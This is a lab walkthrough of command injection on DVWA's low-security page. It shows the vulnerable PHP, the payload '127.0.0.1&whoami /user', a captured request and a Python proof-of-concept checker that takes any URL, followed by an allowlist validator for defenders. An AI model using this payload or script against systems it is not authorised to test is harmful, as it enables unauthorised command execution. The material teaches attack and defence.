Here we again capture the traffic while visiting DVWA's low-difficulty Command Injection page.
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];
    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping -c 4 ' . $target );
    }
    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>
The source is shown above: the input is not filtered at all, and the command output is echoed straight back to the page.
Using the payload 127.0.0.1&whoami /user, the response contains the distinctive value SID, which we can later use to decide whether the vulnerability is present.
Capture the request and analyze it; the POC is built from this packet.
POST /dv/vulnerabilities/exec/ HTTP/1.1
Host: 10.9.75.161
Content-Length: 43
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.9.75.161
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.9.75.161/dv/vulnerabilities/exec/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3
Connection: close

ip=127.0.0.1%26whoami+%2Fuser&Submit=Submit
Build the target
    POST /dv/vulnerabilities/exec/ HTTP/1.1
    target = url + "/dv/vulnerabilities/exec/"
Build the headers
Host: 10.9.75.161
Content-Length: 43
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.9.75.161
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.9.75.161/dv/vulnerabilities/exec/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3
Connection: close
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
    }
Build the data
    ip=127.0.0.1%26whoami+%2Fuser&Submit=Submit
    data = {
        "ip": "127.0.0.1&whoami /user",
        "Submit": "Submit"
    }
Build the final POC
    import requests

    def command(url):
        try:
            target = url + "/dv/vulnerabilities/exec/"
            # Headers taken from the captured request; the Cookie carries the
            # logged-in PHPSESSID and security=low, so the request is accepted.
            headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
            }
            # Form body from the capture, URL-decoded: the & after the IP ends the
            # ping command, and the output of whoami /user contains the string SID.
            data = {
                "ip": "127.0.0.1&whoami /user",
                "Submit": "Submit"
            }
            res = requests.post(target, headers=headers, data=data)
            print(res.text)
            # whoami /user is a Windows command, so the SID marker only appears
            # when the target host runs Windows.
            if "SID" in res.text:
                print("[+]", url, "存在命令注入漏洞")
            else:
                print("[-]", url, "未找到命令注入漏洞")
        except Exception as e:
            print("Error")
            print(e)

    if __name__ == '__main__':
        url = input('请输入要检测的url:')
        command('http://' + url)
Verify the result
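The DVWA source above performs no validation of the ip field. As an added example (not code from DVWA or from the original post), the check below shows the allowlist validation a defender would apply to that field: it decodes the captured form body, requires the value to be a literal IP address, and reports which shell metacharacters were present. The function name check_ip_param and the second, clean sample body are my own constructions.

```python
import ipaddress
from urllib.parse import parse_qs

# Shell metacharacters that let a value break out of the
# 'ping -c 4 ' . $target concatenation in the DVWA code.
SHELL_META = set("&|;`$()<>\n\r")


def check_ip_param(body: str) -> dict:
    """Decode an x-www-form-urlencoded POST body and decide whether
    its 'ip' field is a literal IP address.

    The allowlist check (ipaddress.ip_address) is the actual control;
    the metacharacter list is only reported so a log entry can say
    what was attempted."""
    fields = parse_qs(body, keep_blank_values=True)
    ip = fields.get("ip", [""])[0]  # parse_qs also URL-decodes %26 -> &
    found = sorted(SHELL_META & set(ip))
    try:
        ipaddress.ip_address(ip)  # accepts IPv4 and IPv6 literals only
        valid = True
    except ValueError:
        valid = False
    return {"ip": ip, "valid": valid, "metachars": found}


# Constructed sample bodies: the first is the payload captured on this
# page, the second is what a legitimate submission of the form looks like.
SAMPLES = [
    "ip=127.0.0.1%26whoami+%2Fuser&Submit=Submit",
    "ip=127.0.0.1&Submit=Submit",
]

if __name__ == "__main__":
    for body in SAMPLES:
        r = check_ip_param(body)
        verdict = "allow" if r["valid"] else "reject"
        print(f"{verdict}: ip={r['ip']!r} metachars={r['metachars']}")
```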